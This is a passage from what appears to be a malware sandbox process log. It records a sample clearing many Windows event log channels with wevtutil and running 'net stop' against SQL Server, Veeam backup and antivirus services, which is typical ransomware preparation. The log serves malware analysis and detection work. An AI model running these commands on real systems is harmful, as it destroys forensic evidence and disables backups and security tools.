C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiagCpl/Debug"
4⤵
- Clears Windows event logs
PID:3384

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Analytic"
4⤵
PID:2220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Debug"
4⤵
PID:3408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-DPS/Operational"
4⤵
PID:3436

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-MSDE/Debug"
4⤵
PID:1628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Analytic"
4⤵
PID:3444

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Debug"
4⤵
PID:1200

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PCW/Operational"
4⤵
PID:2308

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Debug"
4⤵
PID:1048

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-PLA/Operational"
4⤵
PID:544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Perfhost/Analytic"
4⤵
PID:3476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scheduled/Operational"
4⤵
PID:360

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Admin"
4⤵
PID:3472

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Analytic"
4⤵
PID:1924

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Debug"
4⤵
PID:212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-Scripted/Operational"
4⤵
PID:3512

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Debug"
4⤵
PID:3504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-ScriptedDiagnosticsProvider/Operational"
4⤵
PID:3536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-TaskManager/Debug"
4⤵
PID:3524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDC/Analytic"
4⤵
PID:236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnosis-WDI/Debug"
4⤵
PID:2804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Debug"
4⤵
PID:3544

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Networking/Operational"
4⤵
PID:3552

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack-Counters/Diagnostic"
4⤵
PID:3568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-PerfTrack/Diagnostic"
4⤵
- Clears Windows event logs
PID:3464

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic"
4⤵
PID:3652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Diagnostic/Loopback"
4⤵
PID:3636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Diagnostics-Performance/Operational"
4⤵
PID:3660

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10/Analytic"
4⤵
- Clears Windows event logs
PID:3676

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D10_1/Analytic"
4⤵
PID:3692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Analytic"
4⤵
PID:3668

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/Logging"
4⤵
PID:3624

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Direct3D11/PerfTiming"
4⤵
PID:3736

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectShow-KernelSupport/Performance"
4⤵
PID:3748

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectSound/Debug"
4⤵
PID:3712

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite-FontCache/Tracing"
4⤵
PID:3620

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DirectWrite/Tracing"
4⤵
- Clears Windows event logs
PID:3720

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Disk/Operational"
4⤵
- Clears Windows event logs
PID:3768

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnostic/Operational"
4⤵
PID:3804

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticDataCollector/Operational"
4⤵
PID:3796

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DiskDiagnosticResolver/Operational"
4⤵
PID:3776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Debug"
4⤵
PID:3800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplayColorCalibration/Operational"
4⤵
- Clears Windows event logs
PID:3852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DisplaySwitch/Diagnostic"
4⤵
PID:3844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Documents/Performance"
4⤵
PID:3920

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DriverFrameworks-UserMode/Operational"
4⤵
PID:3888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Diagnostic"
4⤵
PID:3948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxgKrnl/Performance"
4⤵
PID:3988

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskRingtone/Analytic"
4⤵
PID:3956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-DxpTaskSyncProvider/Analytic"
4⤵
PID:3900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EFS/Debug"
4⤵
PID:3952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Analytic"
4⤵
PID:4068

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Debug"
4⤵
- Clears Windows event logs
PID:3964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EapHost/Operational"
4⤵
PID:4088

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EaseOfAccess/Diagnostic"
4⤵
PID:2852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Debug"
4⤵
- Clears Windows event logs
PID:2764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventCollector/Operational"
4⤵
- Clears Windows event logs
PID:3104

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog-WMIProvider/Debug"
4⤵
PID:2896

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Analytic"
4⤵
PID:2908

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-EventLog/Debug"
4⤵
PID:3120

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Analytic"
4⤵
- Clears Windows event logs
PID:3128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Debug"
4⤵
PID:2776

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FMS/Operational"
4⤵
PID:2964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FailoverClustering-Client/Diagnostic"
4⤵
PID:2808

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Fault-Tolerant-Heap/Operational"
4⤵
PID:2880

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Feedback-Service-TriggerProvider"
4⤵
PID:2800

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-FileInfoMinifilter/Operational"
4⤵
PID:2192

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Firewall-CPL/Diagnostic"
4⤵
PID:2820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Folder Redirection/Operational"
4⤵
- Clears Windows event logs
PID:2188

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Debug"
4⤵
PID:1724

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Forwarding/Operational"
4⤵
PID:2568

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GettingStarted/Diagnostic"
4⤵
PID:2792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-GroupPolicy/Operational"
4⤵
PID:2692

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HAL/Debug"
4⤵
PID:888

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Debug"
4⤵
PID:2184

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenter/Performance"
4⤵
PID:2128

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HealthCenterCPL/Performance"
4⤵
PID:1388

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Help/Operational"
4⤵
PID:2952

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel Performance/Diagnostic"
4⤵
PID:900

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Control Panel/Operational"
4⤵
PID:792

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Listener Service/Operational"
4⤵
PID:3076

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service Performance/Diagnostic"
4⤵
PID:1476

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup Provider Service/Operational"
4⤵
PID:1408

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HomeGroup-ListenerService"
4⤵
PID:964

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HotStart/Diagnostic"
4⤵
PID:2204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-HttpService/Trace"
4⤵
PID:3176

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKE/Operational"
4⤵
- Clears Windows event logs
PID:2092

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IKEDBG/Debug"
4⤵
- Clears Windows event logs
PID:3180

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPBusEnum/Tracing"
4⤵
PID:3244

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-IPSEC-SRV/Diagnostic"
4⤵
PID:3204

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International-RegionalOptionsControlPanel/Operational"
4⤵
PID:1636

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-International/Operational"
4⤵
PID:592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Debug"
4⤵
PID:1820

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Operational"
4⤵
- Clears Windows event logs
PID:852

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Iphlpsvc/Trace"
4⤵
PID:3248

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Acpi/Diagnostic"
4⤵
PID:3276

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Boot/Analytic"
4⤵
PID:2956

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-BootDiagnostics/Diagnostic"
4⤵
PID:3236

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Disk/Analytic"
4⤵
PID:1744

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Admin"
4⤵
PID:2948

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-EventTracing/Analytic"
4⤵
PID:2884

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-File/Analytic"
4⤵
PID:3304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Memory/Analytic"
4⤵
PID:3292

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Network/Analytic"
4⤵
PID:2592

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-PnP/Diagnostic"
4⤵
PID:2336

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
4⤵
PID:3036

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
4⤵
PID:3016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
4⤵
- Clears Windows event logs
PID:2508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Prefetch/Diagnostic"
4⤵
PID:2536

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Process/Analytic"
4⤵
PID:2232

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Processor-Power/Diagnostic"
4⤵
PID:2320

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Registry/Analytic"
4⤵
PID:2148

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Analytic"
4⤵
PID:3220

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-StoreMgr/Operational"
4⤵
PID:2344

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Analytic"
4⤵
PID:1716

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Debug"
4⤵
PID:2480

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WDI/Operational"
4⤵
PID:1340

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Errors"
4⤵
PID:1228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-WHEA/Operational"
4⤵
PID:2264

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Known Folders API Service"
4⤵
PID:2960

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-L2NA/Diagnostic"
4⤵
PID:2840

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LDAP-Client/Debug"
4⤵
- Clears Windows event logs
PID:2548

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LUA-ConsentUI/Diagnostic"
4⤵
PID:2304

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Analytic"
4⤵
PID:3372

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Debug"
4⤵
- Clears Windows event logs
PID:1016

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-LanguagePackSetup/Operational"
4⤵
PID:2784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MCT/Operational"
4⤵
PID:1824

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-CLNT/Diagnostic"
4⤵
- Clears Windows event logs
PID:2844

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-DRV/Diagnostic"
4⤵
PID:3368

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MPS-SRV/Diagnostic"
4⤵
PID:1156

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Admin"
4⤵
PID:788

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Debug"
4⤵
PID:3432

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MSPaint/Diagnostic"
4⤵
PID:3428

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Admin"
4⤵
PID:2504

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Analytic"
4⤵
PID:2412

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Debug"
4⤵
PID:2224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MUI/Operational"
4⤵
- Clears Windows event logs
PID:3448

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SinkWriter"
4⤵
PID:1524

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/SourceReader"
4⤵
PID:2116

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-MFReadWrite/Transform"
4⤵
- Clears Windows event logs
PID:468

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MediaFoundation-PlayAPI/Analytic"
4⤵
PID:3452

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MemoryDiagnostics-Results/Debug"
4⤵
PID:2836

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-MobilityCenter/Performance"
4⤵
PID:2212

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Analytic"
4⤵
PID:2112

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NCSI/Operational"
4⤵
PID:1008

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDF-HelperClassDiscovery/Debug"
4⤵
PID:1684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS-PacketCapture/Diagnostic"
4⤵
PID:3484

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Diagnostic"
4⤵
PID:3496

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NDIS/Operational"
4⤵
PID:3328

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NTLM/Operational"
4⤵
PID:208

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NWiFi/Diagnostic"
4⤵
PID:3508

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Narrator/Diagnostic"
4⤵
PID:228

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetShell/Performance"
4⤵
PID:2928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Network-and-Sharing-Center/Diagnostic"
4⤵
PID:224

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/Operational"
4⤵
PID:3588

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkAccessProtection/WHC"
4⤵
PID:3584

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkLocationWizard/Operational"
4⤵
PID:2652

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Diagnostic"
4⤵
PID:3572

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NetworkProfile/Operational"
4⤵
- Clears Windows event logs
PID:1364

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Networking-Correlation/Diagnostic"
4⤵
PID:556

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Diagnostic"
4⤵
PID:3612

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-NlaSvc/Operational"
4⤵
- Clears Windows event logs
PID:3640

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Debug"
4⤵
PID:3708

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OLEACC/Diagnostic"
4⤵
PID:3596

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OOBE-Machine/Diagnostic"
4⤵
- Clears Windows event logs
PID:3684

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Analytic"
4⤵
PID:3704

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Debug"
4⤵
PID:3600

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/Operational"
4⤵
- Clears Windows event logs
PID:1928

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OfflineFiles/SyncLog"
4⤵
PID:3628

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OneX/Diagnostic"
4⤵
PID:532

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-OobeLdr/Analytic"
4⤵
PID:3732

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PCI/Diagnostic"
4⤵
PID:3784

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ParentalControls/Operational"
4⤵
PID:3764

C:\Windows\system32\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PeerToPeerDrtEventProvider/Diagnostic"
4⤵
- Clears Windows event logs
PID:3824

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SBSMONITORING"
3⤵
PID:4020

C:\Windows\system32\net.exe
net stop "SQLAgent$SBSMONITORING"
4⤵
PID:4068

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SBSMONITORING"
5⤵
PID:4052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SHAREPOINT"
3⤵
PID:2764

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SQL_2008"
3⤵
PID:4056

C:\Windows\system32\net.exe
net stop "SQLAgent$SQL_2008"
4⤵
PID:2852

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SQL_2008"
5⤵
PID:2768

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$SYSTEM_BGC"
3⤵
PID:3104

C:\Windows\system32\net.exe
net stop "SQLAgent$SYSTEM_BGC"
4⤵
PID:2856

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$SYSTEM_BGC"
5⤵
PID:3096

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPS"
3⤵
PID:2888

C:\Windows\system32\net.exe
net stop "SQLAgent$TPS"
4⤵
PID:2900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$TPS"
5⤵
PID:3120

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$TPSAMA"
3⤵
PID:2904

C:\Windows\system32\net.exe
net stop "SQLAgent$TPSAMA"
4⤵
PID:3112

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$TPSAMA"
5⤵
PID:2600

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2008R2"
3⤵
PID:3116

C:\Windows\system32\net.exe
net stop "SQLAgent$VEEAMSQL2008R2"
4⤵
PID:2964

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2008R2"
5⤵
PID:3128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLAgent$VEEAMSQL2012"
3⤵
PID:2124

C:\Windows\system32\net.exe
net stop "SQLAgent$VEEAMSQL2012"
4⤵
PID:2940

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLAgent$VEEAMSQL2012"
5⤵
PID:2880

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLBrowser"
3⤵
PID:2120

C:\Windows\system32\net.exe
net stop "SQLBrowser"
4⤵
PID:2632

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLBrowser"
5⤵
PID:2808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLSafeOLRService"
3⤵
PID:2820

C:\Windows\system32\net.exe
net stop "SQLSafeOLRService"
4⤵
PID:2192

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLSafeOLRService"
5⤵
PID:2648

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLSERVERAGENT"
3⤵
PID:2732

C:\Windows\system32\net.exe
net stop "SQLSERVERAGENT"
4⤵
PID:2156

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLSERVERAGENT"
5⤵
PID:2152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY"
3⤵
PID:1732

C:\Windows\system32\net.exe
net stop "SQLTELEMETRY"
4⤵
PID:2792

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLTELEMETRY"
5⤵
PID:2568

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLTELEMETRY$ECWDB2"
3⤵
PID:588

C:\Windows\system32\net.exe
net stop "SQLTELEMETRY$ECWDB2"
4⤵
PID:1936

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLTELEMETRY$ECWDB2"
5⤵
PID:2128

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SQLWriter"
3⤵
PID:2952

C:\Windows\system32\net.exe
net stop "SQLWriter"
4⤵
PID:328

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SQLWriter"
5⤵
PID:1388

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "SstpSvc"
3⤵
PID:792

C:\Windows\system32\net.exe
net stop "SstpSvc"
4⤵
PID:900

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "SstpSvc"
5⤵
PID:868

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "svcGenericHost"
3⤵
PID:3076

C:\Windows\system32\net.exe
net stop "svcGenericHost"
4⤵
PID:1756

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "svcGenericHost"
5⤵
PID:1736

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "tmlisten"
3⤵
PID:524

C:\Windows\system32\net.exe
net stop "tmlisten"
4⤵
PID:2452

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "tmlisten"
5⤵
PID:1476

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "TrueKey"
3⤵
PID:964

C:\Windows\system32\net.exe
net stop "TrueKey"
4⤵
PID:3044

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "TrueKey"
5⤵
PID:1408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "UI0Detect"
3⤵
PID:2180

C:\Windows\system32\net.exe
net stop "UI0Detect"
4⤵
PID:2204

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "UI0Detect"
5⤵
PID:1580

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamBackupSvc"
3⤵
PID:2092

C:\Windows\system32\net.exe
net stop "VeeamBackupSvc"
4⤵
PID:3188

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 stop "VeeamBackupSvc"
5⤵
PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c net stop "VeeamBrokerSvc"
3⤵
PID:1600

C:\Windows\system32\net.exe
net stop "VeeamBrokerSvc"
4⤵
